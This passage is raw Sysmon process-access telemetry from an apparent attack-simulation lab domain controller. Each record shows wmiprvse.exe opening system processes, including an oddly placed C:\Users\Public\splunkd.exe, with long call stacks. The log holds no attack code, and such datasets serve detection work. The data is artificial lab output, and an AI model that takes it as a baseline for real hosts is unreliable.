Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030826Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030825Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030824Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030823Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030822Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030821Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030820Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030819Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030818Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030817Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.989{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030816Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030815Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030814Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030813Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 